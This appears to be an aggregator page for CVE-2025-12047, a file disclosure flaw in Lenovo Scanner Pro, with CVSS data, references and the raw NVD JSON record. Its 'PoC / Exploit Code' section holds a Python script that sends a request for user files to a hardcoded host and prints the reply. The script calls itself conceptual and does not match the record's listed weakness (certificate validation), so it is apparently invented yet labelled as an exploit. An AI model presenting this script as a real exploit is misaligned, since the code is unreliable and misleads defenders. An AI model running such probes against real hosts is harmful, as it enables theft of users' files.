CVE-2025-12047

Description

A vulnerability was reported in the Lenovo Scanner pro application during an internal security assessment that, under certain circumstances, could allow an attacker on the same logical network to disclose sensitive user files from the application.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Lenovo Scanner Pro (所有受影响版本需参照官方公告)

具体版本信息请访问联想官方安全公告页面

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12047 PoC - Lenovo Scanner Pro File Disclosure
# Note: This is a conceptual PoC for demonstration purposes

import socket
import struct

def create_exploit_payload():
    """Generate malicious request to trigger file disclosure"""
    # Target Lenovo Scanner Pro service port
    target_host = "192.168.1.100"  # Target IP
    target_port = 8080  # Default service port
    
    # Malicious HTTP request to access sensitive files
    exploit_request = (
        "GET /api/files/user_data HTTP/1.1\r\n"
        "Host: {}\r\n"
        "User-Agent: LenovoScanner/1.0\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n\r\n"
    ).format(target_host)
    
    return exploit_request.encode()

def exploit_cve_2025_12047():
    """Execute the exploit for CVE-2025-12047"""
    target_host = "192.168.1.100"
    target_port = 8080
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        
        # Send exploit payload
        payload = create_exploit_payload()
        sock.send(payload)
        
        # Receive response (may contain sensitive file data)
        response = sock.recv(4096)
        print(f"[+] Response received: {len(response)} bytes")
        print(response.decode('utf-8', errors='ignore'))
        
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2025-12047 - Lenovo Scanner Pro File Disclosure")
    print("Target: Lenovo Scanner Pro Application")
    print("Vector: Adjacent Network (AV:A)")
    print("-" * 50)
    exploit_cve_2025_12047()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12047
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12047
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12047/
[4] VulDB https://vuldb.com/cve/CVE-2025-12047
[5] https://iknow.lenovo.com.cn/detail/434327

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12047", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:37.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was reported in the Lenovo Scanner pro application during an internal security assessment that, under certain circumstances, could allow an attacker on the same logical network to disclose sensitive user files from the application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/434327", "source": "[email protected]"}]}}